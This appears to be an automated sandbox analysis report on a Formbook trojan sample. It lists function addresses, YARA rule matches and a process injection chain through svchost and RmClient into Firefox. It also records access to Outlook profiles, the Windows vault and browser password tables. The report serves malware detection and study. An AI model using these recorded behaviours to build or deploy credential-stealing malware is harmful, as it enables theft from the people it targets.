Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02ED1AA3 5_2_02ED1AA3
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EA3A6C 5_2_02EA3A6C
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEFA49 5_2_02EEFA49
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE7A46 5_2_02EE7A46
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EA5BF0 5_2_02EA5BF0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E6DBF9 5_2_02E6DBF9
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E4FB80 5_2_02E4FB80
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEFB76 5_2_02EEFB76
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E338E0 5_2_02E338E0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E9D800 5_2_02E9D800
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E39950 5_2_02E39950
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E4B950 5_2_02E4B950
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EC5910 5_2_02EC5910
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E39EB0 5_2_02E39EB0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEFFB1 5_2_02EEFFB1
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E31F92 5_2_02E31F92
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEFF09 5_2_02EEFF09
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EEFCF2 5_2_02EEFCF2
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EA9C32 5_2_02EA9C32
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E4FDC0 5_2_02E4FDC0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE7D73 5_2_02EE7D73
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E33D40 5_2_02E33D40
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02EE1D5A 5_2_02EE1D5A
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_00691990 5_2_00691990
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_0068C8C0 5_2_0068C8C0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_0068CAE0 5_2_0068CAE0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_0068AB60 5_2_0068AB60
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_00695040 5_2_00695040
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_00693220 5_2_00693220
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_0069321B 5_2_0069321B
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006AB670 5_2_006AB670
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEE257 5_2_02CEE257
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEE373 5_2_02CEE373
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CED778 5_2_02CED778
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEE70C 5_2_02CEE70C
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEE718 5_2_02CEE718
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEE4DB 5_2_02CEE4DB
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CF5451 5_2_02CF5451
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CECA33 5_2_02CECA33
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0362B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03687E54 appears 111 times
Source: C:\Windows\SysWOW64\RmClient.exe Code function: String function: 02E77E54 appears 111 times
Source: C:\Windows\SysWOW64\RmClient.exe Code function: String function: 02EAF290 appears 105 times
Source: C:\Windows\SysWOW64\RmClient.exe Code function: String function: 02E65130 appears 58 times
Source: C:\Windows\SysWOW64\RmClient.exe Code function: String function: 02E1B970 appears 280 times
Source: C:\Windows\SysWOW64\RmClient.exe Code function: String function: 02E9EA12 appears 86 times
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: String function: 00445AE0 appears 55 times
Source: enkJ6J7dAn.exe, 00000000.00000003.2140430088.0000000003D33000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs enkJ6J7dAn.exe
Source: enkJ6J7dAn.exe, 00000000.00000003.2142179487.000000000494D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs enkJ6J7dAn.exe
Source: enkJ6J7dAn.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW, 0_2_0044AF6C
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464EAE
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D619
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 0_2_004755C4
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0047839D
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043305F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe File created: C:\Users\user\AppData\Local\Temp\cacostomia Jump to behavior
Source: enkJ6J7dAn.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RmClient.exe, 00000005.00000002.4588947900.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.00000000009F0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2556441787.00000000009F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: enkJ6J7dAn.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe File read: C:\Users\user\Desktop\enkJ6J7dAn.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\enkJ6J7dAn.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
Source: C:\Windows\SysWOW64\RmClient.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe" Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: enkJ6J7dAn.exe Static file information: File size 1402195 > 1048576
Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259492562.000000000040E000.00000002.00000001.01000000.00000004.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442142227.000000000040E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: RmClient.pdb source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: enkJ6J7dAn.exe Static PE information: real checksum: 0xa961f should be: 0x15e23b
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004033B0 push eax; ret 2_2_004033B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004234C3 push edi; retf 2_2_004234CE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401724 push 0000007Ch; iretd 2_2_00401726
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360225F pushad ; ret 2_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036027FA pushad ; ret 2_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx 2_2_036309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360283D push eax; iretd 2_2_03602858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360135F push eax; iretd 2_2_03601369
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Code function: 3_2_029ED49C push ds; retf 3_2_029ED4B0
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02DF225F pushad ; ret 5_2_02DF27F9
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02DF27FA pushad ; ret 5_2_02DF27F9
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02DF283D push eax; iretd 5_2_02DF2858
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02E209AD push ecx; mov dword ptr [esp], ecx 5_2_02E209B6
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02DF1368 push eax; iretd 5_2_02DF1369
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006A0110 push edi; retf 5_2_006A011B
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_00692260 push ds; retf 5_2_00692274
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006A0365 push ebp; ret 5_2_006A0367
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_006A038C push ecx; iretd 5_2_006A038F
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_00697338 push ds; ret 5_2_0069733C
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_0069B602 pushfd ; ret 5_2_0069B604
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEC308 push cs; ret 5_2_02CEC309
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CF5052 push eax; ret 5_2_02CF5054
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEF06A push ebp; iretd 5_2_02CEF072
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CE56F8 pushad ; iretd 5_2_02CE573F
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CE25EE push ebp; ret 5_2_02CE25EF
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CE857A push es; retf 5_2_02CE8584
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CEBFE5 push cs; retf 5_2_02CEBFEF
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_02CE4C7E push 00000021h; retf 5_2_02CE4C80
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe API/Special instruction interceptor: Address: 420A26C
Source: C:\Windows\SysWOW64\RmClient.exe API/Special instruction interceptor: Address: 7FF8C88ED324
